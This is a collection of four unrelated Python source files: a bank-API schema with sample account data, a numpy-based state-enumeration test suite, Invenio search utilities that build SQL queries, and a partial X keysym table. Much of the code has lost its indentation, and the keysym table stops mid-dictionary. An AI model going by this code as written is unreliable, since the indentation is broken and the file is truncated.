#!flask/bin/python
# Source: gwdavis/bank-api, models.py (MIT license)
########################################################################
# Table Definitions
########################################################################
Accounts = {
'customer_id': "INTEGER NOT NULL", # integer
# 'customer_name': "TEXT NOT NULL", # string
'account_number': "INTEGER PRIMARY KEY AUTOINCREMENT", # int
'account_type': "TEXT NOT NULL", # string
'balance': "REAL NOT NULL DEFAULT 0", # deprecated
'last_event_id': "INTEGER NOT NULL", # integer
    'last_event_time': "TEXT NOT NULL",  # seconds since epoch
'active': "INTEGER NOT NULL" # boolean
}
Balances = {
'event_id': "INTEGER", # integer
    'account_number': "INTEGER NOT NULL",  # integer
'balance': "DECIMAL NOT NULL" # decimal
}
Customers = {
'customer_id': "INTEGER PRIMARY KEY AUTOINCREMENT",
'customer_name': "TEXT NOT NULL",
'mobile_number': "TEXT NOT NULL" # string reg-ex
}
Events = {
'event_id': "INTEGER PRIMARY KEY AUTOINCREMENT",
'timestamp': "REAL NOT NULL", # seconds since epoch
'event_type': "TEXT NOT NULL", # string
}
Transactions = {
'event_id': "INTEGER NOT NULL", # integer
    'originator': "INTEGER NOT NULL",  # integer account number
    'beneficiary': "INTEGER NOT NULL",  # integer account number
'amount': "REAL NOT NULL", # decimal
'reference': "TEXT NOT NULL" # string
}
Settings = {
'id': "INTEGER PRIMARY KEY AUTOINCREMENT",
'savings_rate': "REAL NOT NULL",
'close_of_biz': "TEXT NOT NULL",
'compound_int_type': "TEXT NOT NULL"
}
# To Do - refactor settings module
# Defaults = {
# 'id': "INTEGER PRIMARY KEY AUTOINCREMENT",
# 'savings_rate': "REAL NOT NULL",
# 'close_of_biz': "TEXT NOT NULL",
# 'compound_int_type': "TEXT NOT NULL"
# }
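
# Illustrative sketch (not part of the original module): the table-definition
# dicts above map column names to SQLite column clauses, so CREATE TABLE
# statements can be assembled from them generically. The helper below is
# hypothetical and only shows how these definition dicts are meant to be consumed.
def build_create_table_sql(table_name, columns):
    """Build a CREATE TABLE statement from a {column_name: column_clause} dict
    (illustrative only)."""
    column_defs = ", ".join("%s %s" % (name, clause)
                            for name, clause in columns.items())
    return "CREATE TABLE IF NOT EXISTS %s (%s)" % (table_name, column_defs)
# Example: build_create_table_sql('accounts', Accounts) returns a statement of
# the form "CREATE TABLE IF NOT EXISTS accounts (... customer_id INTEGER NOT NULL ...)".
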
########################################################################
# Data
########################################################################
# To Do - refactor settings module
# defaults = {
# 'close_of_biz': '24:59:59',
# 'compound_int_type': 'continuous'
# }
# settings = {'savings_rate': 0.0125,
# 'close_of_biz': '20:00:00',
# 'compounding_int_type': 'continuous'
# }
accounts = [
{
'customer_id': 1, # integer
'customer_name': u'treasury', # string
'account_number': 12345678, # int
'account_type': u'dda', # string
'balance': 95000, # deprecated
'last_event_id': 4, # integer
'last_event_time': 1479444205.588373, # decimal
'active': True # boolean
},
{
'customer_id': 2,
'customer_name': u'Gary Davis',
'account_number': 48739278,
'account_type': u'dda',
'balance': 1000,
'last_event_id': 2,
'last_event_time': 1479444203.588373,
'active': True
},
{
'customer_id': 3,
'customer_name': u'Gordon Baird',
'account_number': 48739777,
'account_type': u'dda',
'balance': 2000,
'last_event_id': 3,
'last_event_time': 1479444204.588373,
'active': True
},
{
'customer_id': 3,
'customer_name': u'Gordon Baird',
'account_id': 4,
'account_number': 48739778,
'account_type': u'savings',
'interest': True,
'interest_rate': 'savings_rate',
'balance': 2000,
'last_event_id': 4,
'last_event_time': 1479444205.588373,
'active': True
},
]
balances = [
{
        'account_number': 12345678,  # integer
'event_id': 1, # integer
'balance': 100000 # decimal
},
{
'account_number': 48739278,
'event_id': 2,
'balance': 1000
},
{
'account_number': 12345678,
'event_id': 2,
'balance': 99000
},
{
'account_number': 48739777,
'event_id': 3,
'balance': 2000
},
{
'account_number': 12345678,
'event_id': 3,
'balance': 97000
},
{
'account_number': 48739778,
'event_id': 4,
'balance': 2000
},
{
'account_number': 12345678,
'event_id': 4,
'balance': 95000
},
]
customers = [
{
'customer_id': 1,
'customer_name': u'treasury',
'mobile_number': u'212-111-1111'
},
{
'customer_id': 2,
'customer_name': u'Gary Davis',
'mobile_number': u'914-419-9788'
},
{
'customer_id': 3,
'customer_name': u'Gordon Baird',
'mobile_number': u'203-111-1111'
}
]
events = [
{
'event_id': 1, # integer
'timestamp': 1479444202.588373, # seconds since epoch
'event_type': 'transfer', # string
},
{
'event_id': 2, # integer
'timestamp': 1479444203.588373,
'event_type': 'transfer', # string
},
{
'event_id': 3, # integer
'timestamp': 1479444204.588373,
'event_type': 'transfer', # string
},
{
'event_id': 4, # integer
'timestamp': 1479444205.588373,
'event_type': 'transfer', # string
},
]
transactions = [
{
'event_id': 2, # integer
        'originator': 12345678,  # integer account number
        'beneficiary': 48739278,  # integer account number
'amount': -1000, # decimal
'reference': u'Initial Deposit' # string
},
{
'event_id': 2,
'originator': 48739278,
'beneficiary': 12345678,
'amount': 1000,
'reference': u'Initial Deposit'
},
{
'event_id': 3,
'originator': 12345678,
'beneficiary': 48739777,
'amount': -2000,
'reference': u'Initial Deposit'
},
{
'event_id': 3,
'originator': 48739777,
'beneficiary': 12345678,
'amount': 2000,
'reference': u'Initial Deposit'
},
{
'event_id': 4,
'originator': 12345678,
'beneficiary': 48739778,
'amount': -2000,
'reference': u'Initial Deposit'
},
{
'event_id': 4,
'originator': 48739778,
'beneficiary': 12345678,
'amount': 2000,
'reference': u'Initial Deposit'
}
]

# Source: hegland/cmepy, cmepy/tests/state_enum_tests.py (BSD-3-Clause license)
import unittest
import numpy
from numpy.testing.utils import assert_array_equal
import cmepy.state_enum as state_enum
class StateEnumTests(unittest.TestCase):
def test_simple_init(self):
states = [[0, 0, 1, 1, 2, 1, 2],
[0, 1, 0, 1, 1, 2, 2]]
enum = state_enum.create(states)
        # smoke-test the lookups: these calls should simply not raise
        enum.indices(states)
        enum.states([6, 5, 4, 3, 2, 1, 0])
# verify that ordered_states are the same as manually sorting
# with lexsort
sorted_states = numpy.array(states)
order = numpy.lexsort(sorted_states)
sorted_states = sorted_states[:, order]
assert_array_equal(enum.ordered_states,
sorted_states)
# verify that the states have been enumerated with
# respect to lexical ordering
assert_array_equal(enum.states(order), states)
assert_array_equal(enum.indices(states), order)
def test_non_unique_indices_query(self):
states = [[0, 0, 1, 1, 2, 7, 2],
[0, 1, 0, 1, 1, 0, 2]]
goal_order = [0, 2, 5, 1, 3, 4, 6]
assert_array_equal(numpy.lexsort(states),
goal_order)
enum = state_enum.create(states)
# verify that looking up the indices
# for a collection of non-unique query states
# returns a correctly sized index array with the correct
# corresponding indices
query_states = [[7, 2, 1, 2, 1, 7, 7, 2, 1],
[0, 1, 0, 2, 0, 0, 0, 2, 1]]
indices = enum.indices(query_states)
assert_array_equal(indices,
[2, 5, 1, 6, 1, 2, 2, 6, 4])
def test_non_unique_contains_query(self):
states = [[0, 0, 1, 1, 2, 7, 2],
[0, 1, 0, 1, 1, 0, 2]]
enum = state_enum.create(states)
query_states = [[-1, 7, 2, 1, 2, 9, 1, 7, 7, 2, -1, 1],
[-1, 0, 1, 0, 2, 9, 0, 0, 0, 2, -1, 1]]
member_flags = enum.contains(query_states)
goal_member_flags = [False,
True,
True,
True,
True,
False,
True,
True,
True,
True,
False,
True]
assert_array_equal(member_flags,
goal_member_flags)
def test_non_unique_indices_query_offset(self):
states = [[0, 0, 1, 1, 2, 7, 2],
[0, 1, 0, 1, 1, 0, 2]]
goal_order = [0, 2, 5, 1, 3, 4, 6]
assert_array_equal(numpy.lexsort(states),
goal_order)
enum = state_enum.create(states)
# apply offset
offset = 42
enum.offset = offset
# verify that looking up the indices
# for a collection of non-unique query states
# returns a correctly sized index array with the correct
# corresponding indices
query_states = [[7, 2, 1, 2, 1, 7, 7, 2, 1],
[0, 1, 0, 2, 0, 0, 0, 2, 1]]
indices = enum.indices(query_states)
assert_array_equal(indices - offset,
[2, 5, 1, 6, 1, 2, 2, 6, 4])
def test_pack_unpack_distributions(self):
states = [[0, 0, 1, 1, 2, 7, 2],
[0, 1, 0, 1, 1, 0, 2]]
enum = state_enum.create(states)
p_sparse = {(1, 1) : 0.3,
(7, 0) : 0.2,
(1, 0) : 0.5}
p_dense = enum.pack_distribution(p_sparse)
assert_array_equal(p_dense,
[0.0, 0.5, 0.2, 0.0, 0.3, 0.0, 0.0])
q_sparse = enum.unpack_distribution(p_dense)
for state in p_sparse:
assert state in q_sparse
assert p_sparse[state] == q_sparse[state]
for state in q_sparse:
assert state in p_sparse
assert p_sparse[state] == q_sparse[state]
def suite():
suite = unittest.TestLoader().loadTestsFromTestCase(StateEnumTests)
return suite
def main():
    unittest.main()
if __name__ == '__main__':
main()

# Source: nkalodimas/invenio, modules/websearch/lib/search_engine_utils.py (GPL-2.0 license)
# -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
# pylint: disable=C0301
"""Invenio search engine utilities."""
import string
from invenio.config import CFG_BIBFORMAT_HIDDEN_TAGS
from invenio.dbquery import run_sql
from invenio.intbitset import intbitset
def get_fieldvalues(recIDs, tag, repetitive_values=True, sort=True, split_by=0):
"""
Return list of field values for field TAG for the given record ID
or list of record IDs. (RECIDS can be both an integer or a list
of integers.)
If REPETITIVE_VALUES is set to True, then return all values even
if they are doubled. If set to False, then return unique values
only.
"""
out = []
try:
recIDs = int(recIDs)
    except (ValueError, TypeError):
pass
if isinstance(recIDs, (int, long)):
recIDs = [recIDs,]
if not isinstance(recIDs, (list, tuple, intbitset)):
return []
if len(recIDs) == 0:
return []
if tag == "001___":
# We have asked for tag 001 (=recID) that is not stored in bibXXx
# tables.
out = [str(recID) for recID in recIDs]
else:
# we are going to look inside bibXXx tables
digits = tag[0:2]
try:
intdigits = int(digits)
if intdigits < 0 or intdigits > 99:
raise ValueError
except ValueError:
# invalid tag value asked for
return []
bx = "bib%sx" % digits
bibx = "bibrec_bib%sx" % digits
if not repetitive_values:
queryselect = "DISTINCT(bx.value)"
else:
queryselect = "bx.value"
if sort:
sort_sql = "ORDER BY bibx.field_number, bx.tag ASC"
else:
sort_sql = ""
def get_res(recIDs):
query = "SELECT %s FROM %s AS bx, %s AS bibx " \
"WHERE bibx.id_bibrec IN (%s) AND bx.id=bibx.id_bibxxx AND " \
"bx.tag LIKE %%s %s" % \
(queryselect, bx, bibx, ("%s,"*len(recIDs))[:-1], sort_sql)
return [i[0] for i in run_sql(query, tuple(recIDs) + (tag,))]
#print not sort and split_by>0 and len(recIDs)>split_by
if sort or split_by<=0 or len(recIDs)<=split_by:
return get_res(recIDs)
else:
return [i for res in map(get_res, zip(*[iter(recIDs)]*split_by)) for i in res]
return out
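
# Usage sketch (record IDs and values below are illustrative, not taken from a
# real installation): get_fieldvalues(10, '245__a') would return the MARC
# 245 $a values (titles) stored for record 10, e.g. ['Some record title'],
# while get_fieldvalues([10, 11], '001___') returns ['10', '11'] straight from
# the record IDs, since tag 001 is never stored in the bibXXx tables.
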
def get_fieldvalues_alephseq_like(recID, tags_in, can_see_hidden=False):
"""Return buffer of ALEPH sequential-like textual format with fields found
in the list TAGS_IN for record RECID.
If can_see_hidden is True, just print everything. Otherwise hide fields
from CFG_BIBFORMAT_HIDDEN_TAGS.
"""
out = ""
if type(tags_in) is not list:
tags_in = [tags_in,]
if len(tags_in) == 1 and len(tags_in[0]) == 6:
## case A: one concrete subfield asked, so print its value if found
## (use with care: can mislead if field has multiple occurrences)
out += string.join(get_fieldvalues(recID, tags_in[0]),"\n")
else:
## case B: print our "text MARC" format; works safely all the time
# find out which tags to output:
dict_of_tags_out = {}
if not tags_in:
for i in range(0, 10):
for j in range(0, 10):
dict_of_tags_out["%d%d%%" % (i, j)] = 1
else:
for tag in tags_in:
if len(tag) == 0:
for i in range(0, 10):
for j in range(0, 10):
dict_of_tags_out["%d%d%%" % (i, j)] = 1
elif len(tag) == 1:
for j in range(0, 10):
dict_of_tags_out["%s%d%%" % (tag, j)] = 1
elif len(tag) < 5:
dict_of_tags_out["%s%%" % tag] = 1
                else:
dict_of_tags_out[tag[0:5]] = 1
tags_out = dict_of_tags_out.keys()
tags_out.sort()
# search all bibXXx tables as needed:
for tag in tags_out:
digits = tag[0:2]
try:
intdigits = int(digits)
if intdigits < 0 or intdigits > 99:
raise ValueError
except ValueError:
# invalid tag value asked for
continue
if tag.startswith("001") or tag.startswith("00%"):
if out:
out += "\n"
out += "%09d %s %d" % (recID, "001__", recID)
bx = "bib%sx" % digits
bibx = "bibrec_bib%sx" % digits
query = "SELECT b.tag,b.value,bb.field_number FROM %s AS b, %s AS bb "\
"WHERE bb.id_bibrec=%%s AND b.id=bb.id_bibxxx AND b.tag LIKE %%s"\
"ORDER BY bb.field_number, b.tag ASC" % (bx, bibx)
res = run_sql(query, (recID, str(tag)+'%'))
# go through fields:
field_number_old = -999
field_old = ""
for row in res:
field, value, field_number = row[0], row[1], row[2]
ind1, ind2 = field[3], field[4]
printme = True
#check the stuff in hiddenfields
if not can_see_hidden:
for htag in CFG_BIBFORMAT_HIDDEN_TAGS:
ltag = len(htag)
samelenfield = field[0:ltag]
if samelenfield == htag:
printme = False
if ind1 == "_":
ind1 = ""
if ind2 == "_":
ind2 = ""
# print field tag
if printme:
if field_number != field_number_old or field[:-1] != field_old[:-1]:
if out:
out += "\n"
out += "%09d %s " % (recID, field[:5])
field_number_old = field_number
field_old = field
# print subfield value
if field[0:2] == "00" and field[-1:] == "_":
out += value
else:
out += "$$%s%s" % (field[-1:], value)
return out
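
# Output sketch (hypothetical record, for illustration only): for recID 10 with
# a single title field, the "text MARC" buffer built above would look like
#   000000010 001__ 10
#   000000010 245__ $$aSome title$$bSome subtitle
# i.e. one line per field occurrence: the zero-padded record ID, the 5-character
# tag as stored in bibXXx, then each subfield prefixed with "$$" and its code.
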

# Source: andrelaszlo/qtile, libqtile/xkeysyms.py
keysyms = {
'XF86AudioLowerVolume': 0x1008ff11,
'XF86AudioMute': 0x1008ff12,
'XF86AudioRaiseVolume': 0x1008ff13,
'XF86AudioPlay': 0x1008ff14,
'XF86AudioStop': 0x1008ff15,
'XF86AudioPrev': 0x1008ff16,
'XF86AudioNext': 0x1008ff17,
'VoidSymbol': 0xffffff,
'BackSpace': 0xff08,
'Tab': 0xff09,
'Linefeed': 0xff0a,
'Clear': 0xff0b,
'Return': 0xff0d,
'Pause': 0xff13,
'Scroll_Lock': 0xff14,
'Sys_Req': 0xff15,
'Escape': 0xff1b,
'Delete': 0xffff,
'Multi_key': 0xff20,
'Codeinput': 0xff37,
'SingleCandidate': 0xff3c,
'MultipleCandidate': 0xff3d,
'PreviousCandidate': 0xff3e,
'Kanji': 0xff21,
'Muhenkan': 0xff22,
'Henkan_Mode': 0xff23,
'Henkan': 0xff23,
'Romaji': 0xff24,
'Hiragana': 0xff25,
'Katakana': 0xff26,
'Hiragana_Katakana': 0xff27,
'Zenkaku': 0xff28,
'Hankaku': 0xff29,
'Zenkaku_Hankaku': 0xff2a,
'Touroku': 0xff2b,
'Massyo': 0xff2c,
'Kana_Lock': 0xff2d,
'Kana_Shift': 0xff2e,
'Eisu_Shift': 0xff2f,
'Eisu_toggle': 0xff30,
'Kanji_Bangou': 0xff37,
'Zen_Koho': 0xff3d,
'Mae_Koho': 0xff3e,
'Home': 0xff50,
'Left': 0xff51,
'Up': 0xff52,
'Right': 0xff53,
'Down': 0xff54,
'Prior': 0xff55,
'Page_Up': 0xff55,
'Next': 0xff56,
'Page_Down': 0xff56,
'End': 0xff57,
'Begin': 0xff58,
'Select': 0xff60,
'Print': 0xff61,
'Execute': 0xff62,
'Insert': 0xff63,
'Undo': 0xff65,
'Redo': 0xff66,
'Menu': 0xff67,
'Find': 0xff68,
'Cancel': 0xff69,
'Help': 0xff6a,
'Break': 0xff6b,
'Mode_switch': 0xff7e,
'script_switch': 0xff7e,
'Num_Lock': 0xff7f,
'KP_Space': 0xff80,
'KP_Tab': 0xff89,
'KP_Enter': 0xff8d,
'KP_F1': 0xff91,
'KP_F2': 0xff92,
'KP_F3': 0xff93,
'KP_F4': 0xff94,
'KP_Home': 0xff95,
'KP_Left': 0xff96,
'KP_Up': 0xff97,
'KP_Right': 0xff98,
'KP_Down': 0xff99,
'KP_Prior': 0xff9a,
'KP_Page_Up': 0xff9a,
'KP_Next': 0xff9b,
'KP_Page_Down': 0xff9b,
'KP_End': 0xff9c,
'KP_Begin': 0xff9d,
'KP_Insert': 0xff9e,
'KP_Delete': 0xff9f,
'KP_Equal': 0xffbd,
'KP_Multiply': 0xffaa,
'KP_Add': 0xffab,
'KP_Separator': 0xffac,
'KP_Subtract': 0xffad,
'KP_Decimal': 0xffae,
'KP_Divide': 0xffaf,
'KP_0': 0xffb0,
'KP_1': 0xffb1,
'KP_2': 0xffb2,
'KP_3': 0xffb3,
'KP_4': 0xffb4,
'KP_5': 0xffb5,
'KP_6': 0xffb6,
'KP_7': 0xffb7,
'KP_8': 0xffb8,
'KP_9': 0xffb9,
'F1': 0xffbe,
'F2': 0xffbf,
'F3': 0xffc0,
'F4': 0xffc1,
'F5': 0xffc2,
'F6': 0xffc3,
'F7': 0xffc4,
'F8': 0xffc5,
'F9': 0xffc6,
'F10': 0xffc7,
'F11': 0xffc8,
'L1': 0xffc8,
'F12': 0xffc9,
'L2': 0xffc9,
'F13': 0xffca,
'L3': 0xffca,
'F14': 0xffcb,
'L4': 0xffcb,
'F15': 0xffcc,
'L5': 0xffcc,
'F16': 0xffcd,
'L6': 0xffcd,
'F17': 0xffce,
'L7': 0xffce,
'F18': 0xffcf,
'L8': 0xffcf,
'F19': 0xffd0,
'L9': 0xffd0,
'F20': 0xffd1,
'L10': 0xffd1,
'F21': 0xffd2,
'R1': 0xffd2,
'F22': 0xffd3,
'R2': 0xffd3,
'F23': 0xffd4,
'R3': 0xffd4,
'F24': 0xffd5,
'R4': 0xffd5,
'F25': 0xffd6,
'R5': 0xffd6,
'F26': 0xffd7,
'R6': 0xffd7,
'F27': 0xffd8,
'R7': 0xffd8,
'F28': 0xffd9,
'R8': 0xffd9,
'F29': 0xffda,
'R9': 0xffda,
'F30': 0xffdb,
'R10': 0xffdb,
'F31': 0xffdc,
'R11': 0xffdc,
'F32': 0xffdd,
'R12': 0xffdd,
'F33': 0xffde,
'R13': 0xffde,
'F34': 0xffdf,
'R14': 0xffdf,
'F35': 0xffe0,
'R15': 0xffe0,
'Shift_L': 0xffe1,
'Shift_R': 0xffe2,
'Control_L': 0xffe3,
'Control_R': 0xffe4,
'Caps_Lock': 0xffe5,
'Shift_Lock': 0xffe6,
'Meta_L': 0xffe7,
'Meta_R': 0xffe8,
'Alt_L': 0xffe9,
'Alt_R': 0xffea,
'Super_L': 0xffeb,
'Super_R': 0xffec,
'Hyper_L': 0xffed,
'Hyper_R': 0xffee,
'ISO_Lock': 0xfe01,
'ISO_Level2_Latch': 0xfe02,
'ISO_Level3_Shift': 0xfe03,
'ISO_Level3_Latch': 0xfe04,
'ISO_Level3_Lock': 0xfe05,
'ISO_Level5_Shift': 0xfe11,
'ISO_Level5_Latch': 0xfe12,
'ISO_Level5_Lock': 0xfe13,
'ISO_Group_Shift': 0xff7e,
'ISO_Group_Latch': 0xfe06,
'ISO_Group_Lock': 0xfe07,
'ISO_Next_Group': 0xfe08,
'ISO_Next_Group_Lock': 0xfe09,
'ISO_Prev_Group': 0xfe0a,
'ISO_Prev_Group_Lock': 0xfe0b,
'ISO_First_Group': 0xfe0c,
'ISO_First_Group_Lock': 0xfe0d,
'ISO_Last_Group': 0xfe0e,
'ISO_Last_Group_Lock': 0xfe0f,
'ISO_Left_Tab': 0xfe20,
'ISO_Move_Line_Up': 0xfe21,
'ISO_Move_Line_Down': 0xfe22,
'ISO_Partial_Line_Up': 0xfe23,
'ISO_Partial_Line_Down': 0xfe24,
'ISO_Partial_Space_Left': 0xfe25,
'ISO_Partial_Space_Right': 0xfe26,
'ISO_Set_Margin_Left': 0xfe27,
'ISO_Set_Margin_Right': 0xfe28,
'ISO_Release_Margin_Left': 0xfe29,
'ISO_Release_Margin_Right': 0xfe2a,
'ISO_Release_Both_Margins': 0xfe2b,
'ISO_Fast_Cursor_Left': 0xfe2c,
'ISO_Fast_Cursor_Right': 0xfe2d,
'ISO_Fast_Cursor_Up': 0xfe2e,
'ISO_Fast_Cursor_Down': 0xfe2f,
'ISO_Continuous_Underline': 0xfe30,
'ISO_Discontinuous_Underline': 0xfe31,
'ISO_Emphasize': 0xfe32,
'ISO_Center_Object': 0xfe33,
'ISO_Enter': 0xfe34,
'dead_grave': 0xfe50,
'dead_acute': 0xfe51,
'dead_circumflex': 0xfe52,
'dead_tilde': 0xfe53,
'dead_perispomeni': 0xfe53,
'dead_macron': 0xfe54,
'dead_breve': 0xfe55,
'dead_abovedot': 0xfe56,
'dead_diaeresis': 0xfe57,
'dead_abovering': 0xfe58,
'dead_doubleacute': 0xfe59,
'dead_caron': 0xfe5a,
'dead_cedilla': 0xfe5b,
'dead_ogonek': 0xfe5c,
'dead_iota': 0xfe5d,
'dead_voiced_sound': 0xfe5e,
'dead_semivoiced_sound': 0xfe5f,
'dead_belowdot': 0xfe60,
'dead_hook': 0xfe61,
'dead_horn': 0xfe62,
'dead_stroke': 0xfe63,
'dead_abovecomma': 0xfe64,
'dead_psili': 0xfe64,
'dead_abovereversedcomma': 0xfe65,
'dead_dasia': 0xfe65,
'dead_doublegrave': 0xfe66,
'dead_belowring': 0xfe67,
'dead_belowmacron': 0xfe68,
'dead_belowcircumflex': 0xfe69,
'dead_belowtilde': 0xfe6a,
'dead_belowbreve': 0xfe6b,
'dead_belowdiaeresis': 0xfe6c,
'dead_invertedbreve': 0xfe6d,
'dead_belowcomma': 0xfe6e,
'dead_currency': 0xfe6f,
'dead_a': 0xfe80,
'dead_A': 0xfe81,
'dead_e': 0xfe82,
'dead_E': 0xfe83,
'dead_i': 0xfe84,
'dead_I': 0xfe85,
'dead_o': 0xfe86,
'dead_O': 0xfe87,
'dead_u': 0xfe88,
'dead_U': 0xfe89,
'dead_small_schwa': 0xfe8a,
'dead_capital_schwa': 0xfe8b,
'First_Virtual_Screen': 0xfed0,
'Prev_Virtual_Screen': 0xfed1,
'Next_Virtual_Screen': 0xfed2,
'Last_Virtual_Screen': 0xfed4,
'Terminate_Server': 0xfed5,
'AccessX_Enable': 0xfe70,
'AccessX_Feedback_Enable': 0xfe71,
'RepeatKeys_Enable': 0xfe72,
'SlowKeys_Enable': 0xfe73,
'BounceKeys_Enable': 0xfe74,
'StickyKeys_Enable': 0xfe75,
'MouseKeys_Enable': 0xfe76,
'MouseKeys_Accel_Enable': 0xfe77,
'Overlay1_Enable': 0xfe78,
'Overlay2_Enable': 0xfe79,
'AudibleBell_Enable': 0xfe7a,
'Pointer_Left': 0xfee0,
'Pointer_Right': 0xfee1,
'Pointer_Up': 0xfee2,
'Pointer_Down': 0xfee3,
'Pointer_UpLeft': 0xfee4,
'Pointer_UpRight': 0xfee5,
'Pointer_DownLeft': 0xfee6,
'Pointer_DownRight': 0xfee7,
'Pointer_Button_Dflt': 0xfee8,
'Pointer_Button1': 0xfee9,
'Pointer_Button2': 0xfeea,
'Pointer_Button3': 0xfeeb,
'Pointer_Button4': 0xfeec,
'Pointer_Button5': 0xfeed,
'Pointer_DblClick_Dflt': 0xfeee,
'Pointer_DblClick1': 0xfeef,
'Pointer_DblClick2': 0xfef0,
'Pointer_DblClick3': 0xfef1,
'Pointer_DblClick4': 0xfef2,
'Pointer_DblClick5': 0xfef3,
'Pointer_Drag_Dflt': 0xfef4,
'Pointer_Drag1': 0xfef5,
'Pointer_Drag2': 0xfef6,
'Pointer_Drag3': 0xfef7,
'Pointer_Drag4': 0xfef8,
'Pointer_Drag5': 0xfefd,
'Pointer_EnableKeys': 0xfef9,
'Pointer_Accelerate': 0xfefa,
'Pointer_DfltBtnNext': 0xfefb,
'Pointer_DfltBtnPrev': 0xfefc,
'3270_Duplicate': 0xfd01,
'3270_FieldMark': 0xfd02,
'3270_Right2': 0xfd03,
'3270_Left2': 0xfd04,
'3270_BackTab': 0xfd05,
'3270_EraseEOF': 0xfd06,
'3270_EraseInput': 0xfd07,
'3270_Reset': 0xfd08,
'3270_Quit': 0xfd09,
'3270_PA1': 0xfd0a,
'3270_PA2': 0xfd0b,
'3270_PA3': 0xfd0c,
'3270_Test': 0xfd0d,
'3270_Attn': 0xfd0e,
'3270_CursorBlink': 0xfd0f,
'3270_AltCursor': 0xfd10,
'3270_KeyClick': 0xfd11,
'3270_Jump': 0xfd12,
'3270_Ident': 0xfd13,
'3270_Rule': 0xfd14,
'3270_Copy': 0xfd15,
'3270_Play': 0xfd16,
'3270_Setup': 0xfd17,
'3270_Record': 0xfd18,
'3270_ChangeScreen': 0xfd19,
'3270_DeleteWord': 0xfd1a,
'3270_ExSelect': 0xfd1b,
'3270_CursorSelect': 0xfd1c,
'3270_PrintScreen': 0xfd1d,
'3270_Enter': 0xfd1e,
'space': 0x0020,
'exclam': 0x0021,
'quotedbl': 0x0022,
'numbersign': 0x0023,
'dollar': 0x0024,
'percent': 0x0025,
'ampersand': 0x0026,
'apostrophe': 0x0027,
'quoteright': 0x0027,
'parenleft': 0x0028,
'parenright': 0x0029,
'asterisk': 0x002a,
'plus': 0x002b,
'comma': 0x002c,
'minus': 0x002d,
'period': 0x002e,
'slash': 0x002f,
'0': 0x0030,
'1': 0x0031,
'2': 0x0032,
'3': 0x0033,
'4': 0x0034,
'5': 0x0035,
'6': 0x0036,
'7': 0x0037,
'8': 0x0038,
'9': 0x0039,
'colon': 0x003a,
'semicolon': 0x003b,
'less': 0x003c,
'equal': 0x003d,
'greater': 0x003e,
'question': 0x003f,
'at': 0x0040,
'A': 0x0041,
'B': 0x0042,
'C': 0x0043,
'D': 0x0044,
'E': 0x0045,
'F': 0x0046,
'G': 0x0047,
'H': 0x0048,
'I': 0x0049,
'J': 0x004a,
'K': 0x004b,
'L': 0x004c,
'M': 0x004d,
'N': 0x004e,
'O': 0x004f,
'P': 0x0050,
'Q': 0x0051,
'R': 0x0052,
'S': 0x0053,
'T': 0x0054,
'U': 0x0055,
'V': 0x0056,
'W': 0x0057,
'X': 0x0058,
'Y': 0x0059,
'Z': 0x005a,
'bracketleft': 0x005b,
'backslash': 0x005c,
'bracketright': 0x005d,
'asciicircum': 0x005e,
'underscore': 0x005f,
'grave': 0x0060,
'quoteleft': 0x0060,
'a': 0x0061,
'b': 0x0062,
'c': 0x0063,
'd': 0x0064,
'e': 0x0065,
'f': 0x0066,
'g': 0x0067,
'h': 0x0068,
'i': 0x0069,
'j': 0x006a,
'k': 0x006b,
'l': 0x006c,
'm': 0x006d,
'n': 0x006e,
'o': 0x006f,
'p': 0x0070,
'q': 0x0071,
'r': 0x0072,
's': 0x0073,
't': 0x0074,
'u': 0x0075,
'v': 0x0076,
'w': 0x0077,
'x': 0x0078,
'y': 0x0079,
'z': 0x007a,
'braceleft': 0x007b,
'bar': 0x007c,
'braceright': 0x007d,
'asciitilde': 0x007e,
'nobreakspace': 0x00a0,
'exclamdown': 0x00a1,
'cent': 0x00a2,
'sterling': 0x00a3,
'currency': 0x00a4,
'yen': 0x00a5,
'brokenbar': 0x00a6,
'section': 0x00a7,
'diaeresis': 0x00a8,
'copyright': 0x00a9,
'ordfeminine': 0x00aa,
'guillemotleft': 0x00ab,
'notsign': 0x00ac,
'hyphen': 0x00ad,
'registered': 0x00ae,
'macron': 0x00af,
'degree': 0x00b0,
'plusminus': 0x00b1,
'twosuperior': 0x00b2,
'threesuperior': 0x00b3,
'acute': 0x00b4,
'mu': 0x00b5,
'paragraph': 0x00b6,
'periodcentered': 0x00b7,
'cedilla': 0x00b8,
'onesuperior': 0x00b9,
'masculine': 0x00ba,
'guillemotright': 0x00bb,
'onequarter': 0x00bc,
'onehalf': 0x00bd,
'threequarters': 0x00be,
'questiondown': 0x00bf,
'Agrave': 0x00c0,
'Aacute': 0x00c1,
'Acircumflex': 0x00c2,
'Atilde': 0x00c3,
'Adiaeresis': 0x00c4,
'Aring': 0x00c5,
'AE': 0x00c6,
'Ccedilla': 0x00c7,
'Egrave': 0x00c8,
'Eacute': 0x00c9,
'Ecircumflex': 0x00ca,
'Ediaeresis': 0x00cb,
'Igrave': 0x00cc,
'Iacute': 0x00cd,
'Icircumflex': 0x00ce,
'Idiaeresis': 0x00cf,
'ETH': 0x00d0,
'Eth': 0x00d0,
'Ntilde': 0x00d1,
'Ograve': 0x00d2,
'Oacute': 0x00d3,
'Ocircumflex': 0x00d4,
'Otilde': 0x00d5,
'Odiaeresis': 0x00d6,
'multiply': 0x00d7,
'Oslash': 0x00d8,
'Ooblique': 0x00d8,
'Ugrave': 0x00d9,
'Uacute': 0x00da,
'Ucircumflex': 0x00db,
'Udiaeresis': 0x00dc,
'Yacute': 0x00dd,
'THORN': 0x00de,
'Thorn': 0x00de,
'ssharp': 0x00df,
'agrave': 0x00e0,
'aacute': 0x00e1,
'acircumflex': 0x00e2,
'atilde': 0x00e3,
'adiaeresis': 0x00e4,
'aring': 0x00e5,
'ae': 0x00e6,
'ccedilla': 0x00e7,
'egrave': 0x00e8,
'eacute': 0x00e9,
'ecircumflex': 0x00ea,
'ediaeresis': 0x00eb,
'igrave': 0x00ec,
'iacute': 0x00ed,
